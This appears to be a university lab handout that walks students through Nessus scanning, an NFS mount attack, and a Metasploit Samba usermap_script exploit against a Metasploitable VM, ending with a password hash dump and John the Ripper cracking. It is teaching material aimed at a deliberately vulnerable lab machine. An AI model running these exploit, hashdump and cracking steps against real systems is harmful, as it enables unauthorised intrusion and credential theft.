Nessus Scanning, RPC and SMB exploit

Prerequisites:

1. Metasploitable Virtual Machine

Objectives:
The main purpose of this exercise is to learn how to exploit other technologies that Kali can help with
and Metasploitable makes vulnerable.

Call for Help:
Do your best to try the tasks below, if you’re confused, or need help, feel free to email or text me at any
point and I will gladly try to help you. If you’re having an Issue, chances are, other people are as well,
and I can update the instructions/comments/add content as necessary.

Tasks:

Setup

1. You’ll need both Kali and Metasploitable Running simultaneously. You can do this by running a
   virtual machine, or by pairing with a friend and running metasploitable over the network (be
   careful here).
2. Make sure you follow the instructions from lecture, and ensure the networks are setup
   accordingly with your layout.

Intro:

1. Refamiliarize yourself with the following sections from Offensive Security’s Website
   a. Introduction
   b. Metasploit Fundamentals
   c. Information Gathering
   https://www.offensive-security.com/metasploit-unleashed/
2. Remember, your Kali virtual machine, and metasploitable virtual machines can easily be
   redownloaded if you encounter an error. Don’t be afraid to experiment.
3. You’ll need the rpcbind package and the nfs-common package to run these steps. In Kali, while
   connected to the internet via NAT or Bridged Mode run the following two commands.

apt-get install rpcbind
apt-get install nfs-common
Network Scanning :

1. Setup
2. Go to the below link and request a trial of nessus. You’ll need the activation key to continue
   this part of the lesson. You can use your rowan email for this registration, or a disposable
   email address.
   NOTE: YOU WILL HAVE 7 DAYS FROM THE TRIAL TO COMPLETE THE ASSIGNMENT.
   https://www.tenable.com/products/nessus
3. The below commands are to be run from Kali until otherwise noted.
4. In Kali, open firefox and go to the following URL.
   https://www.tenable.com/products/nessus
5. Select the appropriate download for your kali architecture either

Nessus-10.0.0-debian6_amd64.deb
Note: The version may have changed since the time of this writing, simply use the latest
version.

6. Change to the download location and install nessus with the command
   sudo dpkg -i <Nessus Package Name>
7. Once the package is installed successfully, you need to run the command to start the service
   /etc/init.d/nessusd start
8. Open Firefox on Kali and go to https://127.0.0.1:8834 or https://localhost:8834
9. Confirm any security exceptions to continue.
10. When prompted create any username and password combination, and use the activation
    key requested to finish setup. It will take some time to finish configuration. You may need
    to find the default username and password depending on the way you installed it.
11. Scanning
    a. Click “New Scan” in the upper right corner.
    b. Select “Advanced Scan”
    c. Enter “Test Scan” like and add the target IP of your Metasploitable Virtual Machine.
    d. Create another advanced scan called “Test Scan Credentialed”
    e. Use the SSH Credentials, and use Password as the Authentication Method.
    f. Use msfadmin and msfadmin for the username and password and select the sudo box
    for elevate privileges.
    g. Save this scan.
    h. Select the checkboxes next to each scan, and click “More” and “Launch”
12. You can review the results by selecting the scans and selecting vulnerabilities.
    Produce a screenshot of the two scans. What do you notice between the two scans?
13. Scan a friend or another computer, raspberry pi, etc that you own only. Find anything
    interesting?

Exploit #1:

14. The below commands are to be run from Kali until otherwise noted.
15. Let’s do some reconnaissance again to determine what might be exploitable using a detailed
    NMAP scan.
    nmap -v -sV <IP Address of Target>
    Note Port 2049. Explain what this service is, and why it may be interesting for us to examine
    further?
16. Let’s see if we can query the system a little further by using rpcinfo.
    rpcinfo -p <IP Address of Target>
    Several ports should be open for nfs, does this confirm your findings in Step 1?
    What about the program column? Does this also confirm your findings in Step 1?
    Hint: https://www.iana.org/assignments/rpc-program-numbers/rpc-program-numbers.xhtml
17. If this is truly what we think it is we, should think about using the showmount command.
    Review what the showmount command does by using man showmount and provide a brief
    explanation.
18. Let’s see what we find by running the below command.
    showmount -e <IP Address of Target>
    What is the output telling you?
19. Review the Linux mount command using the man mount command as well as the df command
    using man df.
    Create a local mount point on your Kali machine by executing the following commands.
    cd /
    mount -t nfs <IP Address of Target>:/ /mnt -o nolock
20. Interrogate your mount by executing df -k
21. Change directory to your mount point by running cd /mnt
22. Change directories in your mount point by executing cd /mnt/home/msfadmin
23. Create a new file in that location by using the command touch.
24. Print the current date and time by using the command date.

Submit a screenshot like the above. What did we just do? Try to navigate, do we have any
restrictions? What else might we be able to do?

25. Switch to your Metasploitable Virtual Machine
26. Execute the command showmount -a.
    What is this telling you?

Exploit #2:

1. The below commands are to be run from Kali until otherwise noted.
2. Let’s do some reconnaissance again to determine what might be exploitable using a detailed
   NMAP scan.
   nmap -v -sV <IP Address of Target>
   Note Port 139 and 445. What service is that most commonly associated with?
3. Start Metasploit by typing msfconsole or using the icon.
4. Determine if there’s a metasploit module for Samba by typing search samba.
5. Type the command use exploit/multi/samba/usermap_script
6. Set the Host for exploitation using set RHOST <IP Address of Target>
7. Exploit by typing exploit
8. Once you’ve exploited, you’ll need to move back to the Metasploit console to execute the next
   commands, you can do that using the background command. If for some reason the
   background command doesn’t work, you can try CTRL+Z.
9. Then from the Metasploit framework command type use post/linux/gather/hashdump
10. Copy the highlighted unshadowed password file.
11. In a new kali terminal (not Metasploit) run the command john < unshadowed password file >
12. What is this? Research john the ripper, how does this software work, be detailed.